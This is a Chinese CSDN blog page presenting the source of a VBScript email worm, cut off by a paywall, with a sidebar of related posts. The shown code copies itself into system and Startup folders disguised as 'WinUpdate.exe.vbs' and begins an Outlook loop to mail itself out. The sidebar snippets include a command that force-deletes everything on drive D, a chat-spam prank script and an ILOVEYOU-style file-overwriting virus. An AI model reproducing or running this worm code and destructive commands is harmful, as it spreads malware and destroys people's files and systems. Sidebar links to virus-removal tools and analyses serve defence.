vbs病毒1

于 2022-04-10 16:44:00 发布
阅读量301 收藏
点赞数
分类专栏: 笔记 文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66083889/article/details/124081072
版权
该博客详细解析了一段VBScript病毒代码,病毒通过复制自身到系统关键位置,利用Outlook发送带有恶意附件的邮件,并执行清理硬盘数据及重新启动计算机的操作。博主探讨了病毒的运行机制和可能的危害,并提醒读者注意防范此类威胁。
摘要由CSDN通过智能技术生成

,,,,

On Error Resume Next

Set fs=CreateObject("Scripting.FileSystemObject")

Set dir1=fs.GetSpecialFolder(0)

Set dir2=fs.GetSpecialFolder(1)

Set so=CreateObject("Scripting.FileSystemObject")

next

On Error Resume Next

dim r

Set r=CreateObject("Wscript.Shell") 

so.GetFile(WScript.ScriptFullName).Copy(dir1&"\WinUpdate.exe.vbs") 

so.GetFile(WScript.ScriptFullName).Copy(dir2&"\WinUpdate.exe.vbs") 

so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\Startup\Win32system\WinUpdate.exe.vbs")

so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\WinUpdate.exe.vbs")

next

On Error Resume Next

Set ol=CreateObject("Outlook.Application") 

For x=1 To 50 

Set Mail=ol.CreateItem(0) 

M

最低0.47元/天 解锁文章
血月星
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
updat.vbs u盘病毒
weixin_30485379的博客
06-23 286
从打印店感染的病毒,u盘里的文件全部成了快捷方式,在网上查了下,一开始用了一个叫“u盘专杀工具”的软件,发现这个工具只能检查出病毒,查杀的话必须要购买软件。 换用360杀毒,解决之。 转载于:https://www.cnblogs.com/begoogatprogram/p/4595764.html...
欢迎使用此代码在txt文本输入以下代码后更改为vbs非常好用,中国寒龙病毒联盟出品-by寒龙...
weixin_30660027的博客
09-07 224
On Error Resume Next Set fs=CreateObject("Scripting.FileSystemObject") Set dir1=fs.GetSpecialFolder(0) Set dir2=fs.GetSpecialFolder(1) Set so=CreateObject("Scripting.FileSystemObject") dim...
VB整人代码【摘】
燃烧的梦
08-23 5254
一、你打开好友的聊天对话框,然后记下在你QQ里好友的昵称,把下面代码里的xx替换一下,就可以自定义发送QQ信息到好友的次数(代码里的数字10改一下即可). xx.vbs=> 复制代码 代码如下:On Error Resume Next Dim wsh,ye set wsh=createobject(“wscript.shell”) for i=1 to 10 wscript.sleep
整人输入指定内容退出html,整人代码
weixin_32365483的博客
06-04 220
set WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true----------------------------------------------------------------------------六、不断弹出窗口----------...
修复被vbs病毒感染的html文件小工具
11-10
1. **自我复制**:VBS病毒能复制自身到其他文件中,通常是通过修改文件的元数据或者直接在文件内容中插入恶意代码。 2. **传播**:病毒可以利用电子邮件、即时消息和网络共享来传播。 3. **破坏系统**:VBS病毒可能...
对一个vbs脚本病毒病毒原理分析
09-01
主要介绍了对一个vbs脚本病毒病毒原理分析的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下
Autorun.vbs病毒专杀工具
04-02
1. **Autorun.vbs病毒**:这种病毒是基于Visual Basic Script (VBS) 编写的,会在插入计算机时自动运行,可能会篡改系统设置,复制自身到其他驱动器,甚至执行更复杂的恶意行为。 2. **自动运行(Autorun)机制**:...
修复被vbs病毒感染的html文件自用工具
11-13
1. **VBS病毒的传播方式**:VBS病毒通常通过电子邮件附件、恶意网站下载或者利用系统漏洞进行传播。一旦用户打开带有病毒的文件或执行了恶意脚本,病毒就会在系统中激活。 2. **VBS病毒的危害**:VBS病毒可以修改...
VBS病毒专杀工具
03-28
VBS病毒,全称为Visual Basic Script(VB脚本)病毒,是一种基于Microsoft Visual Basic Script编程语言编写的恶意软件。这种病毒通常通过电子邮件、网络下载、U盘等途径传播,一旦感染,可能会对用户的计算机系统...
WshShell.Run方法说明
weixin_34212762的博客
09-11 914
2019独角兽企业重金招聘Python工程师标准>>> ...
VBS病毒(爱虫病毒) 源代码
miaozk2006的专栏
05-20 8212
说明:本人对某些代码进行了修改。该文件是一个完整的程序。该文件执行之后,会寻找硬盘上所有满足条件的文件,对其进行强制性覆盖(满足条件的文件数据将全部丢失)、并再创建一个相同文件名但后带.vbs的文件。因此,请注意设立好破坏测试条件,千万不要对他人进行测试,否则,一切后果自负。如果你的系统不支持.vbs,可以将后缀改为.vbe Dim folder, fso, foldername, ...
VBS病毒的解决办法!
jeffery的专栏
09-07 9279
最近电脑中了VBS病毒,都被它搞死了,试了多种方法都搞不定!在网上查了多种的方法,终于把它给查杀了,现在把它总结一下与大家分享.Worm.VBS.headtail.a病毒分析Worm.VBS.headtail.a病毒分析Worm.VBS.headtail.a病毒分析病毒名称:Worm.VBS.headtail.a病毒类型:蠕虫病毒病毒语言:Visual Basic关联文件:WScript.exe多
vbs 脚本2
weixin_30511039的博客
04-06 5509
一些很恶作剧的vbs程序代码 作者: 字体:[增加减小] 类型:转载 时间:2013-01-16我要评论 恶作剧的vbs代码,这里提供的都是一些死循环或导致系统死机的vbs对机器没坏处,最多关机重启一下就可以了,将下面的任意一段代码保存为*.vbs即可 操作方法:把代码保存为*.VBS运行即可经本人亲自测试 不会出大问题的,一般都是利用无限循环,不是死循环,...
vbs 杀死进程_Windows系统使用vbs脚本或bat脚本强制杀死指定所有进程 vbs实现循环持续写入内容到vbs打开开的记事本 使用vbs、bat添加windows计划任务 使用cmd scht...
weixin_39930252的博客
12-20 1094
以下脚本windows7下成功运行过,脚本也可以windows计划任务程序一起组合使用新建一个记事本文档粘贴下面代码后将新建的记事本文档重命名下面对应的脚本名就能使用了:添加windows计划任务cmd命令脚本创建windows计划任务,关键是schtasks添加计划任务命令schtasks参数说明:描述:允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划系统。替代 AT.exe。...
vbs病毒
Zengkaichen的博客
10-14 4646
大家好,那今天小编的要给大家分享一个我搜集一个vbs病毒。 这个病毒仅供参考,在还没有读懂源码之前(因为我是搜集来的代码,所以其实我自己也不懂,嘿嘿嘿......望大佬指教。),请不要运行代码!!(很重要) 有一点,这个病毒是我供给大家学习的,请不要用作非法用途,造成任何后果与本人无关。 那话不多说,直接上源码: On Error Resume Next Set fs=CreateObject("Scripting.FileSystemObject") Set dir1=fs.GetSpecial
7.计算机病毒损坏某些硬件,区别计算机病毒与故障
weixin_34920577的博客
07-13 266
该楼层疑似违规已被系统折叠隐藏此楼查看此楼5.关于CMOS的问题众所周知,CMOS中所存储的信息对计算机系统来说是十分重要的,在微机启动时总是先要按CMOS中的信息来检测和初始化系统(当然是最基本的初始化)。在486以上的主板里,大都有一个病毒监测开关,用户一般情况下都设置为"ON",这时如果安装WINDOWS95,就会发生死机现象。原因是安装WINDOWS95时,安装程序会修改硬盘的引导...
Outlook API
weixin_33810302的博客
05-08 432
1、Outlook简介 若要从Outlook 外控制Outlook对象,必须在编写代码的工程中建立对Outlook对象库的引用。 1.1 Outlook Application说明: 代表整个Microsoft Outlook应用程序。它是层次结构中唯一可使用CreateObject方法或GetObject函数返回的对象。 1.2 Outlook Application 对象的用途: ...
计算机病毒的位置,关于计算机病毒的定位问题
weixin_39819974的博客
07-19 454
该楼层疑似违规已被系统折叠隐藏此楼查看此楼病毒的生存空间就是宿主程序,而因为宿主程序的不同。所以病毒每次插入到宿主程序中的位置也不同。那么病毒需要用到的变量的位置就无法确定。所以这就是病毒首先要重定位的原因。在我们编写程序的时候,所用到的变量的位置都是相对与程序某一个位置的偏移,正常的程序加载的地址是唯一的,所以它们不需要重定位。而病毒的加载是随机的所以就有了重定位的过程。虽然加载的位置不一定,...
VBS脚本病毒:原理解析、防范策略与特点剖析
2. 破坏力强:VBS病毒不仅破坏用户系统文件,还能导致邮件服务器瘫痪和网络堵塞。 3. 感染力强:无需复杂格式处理,通过自我复制迅速感染同类文件,异常处理简单。 4. 传播广泛:通过HTML文档、电子邮件附件等方式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值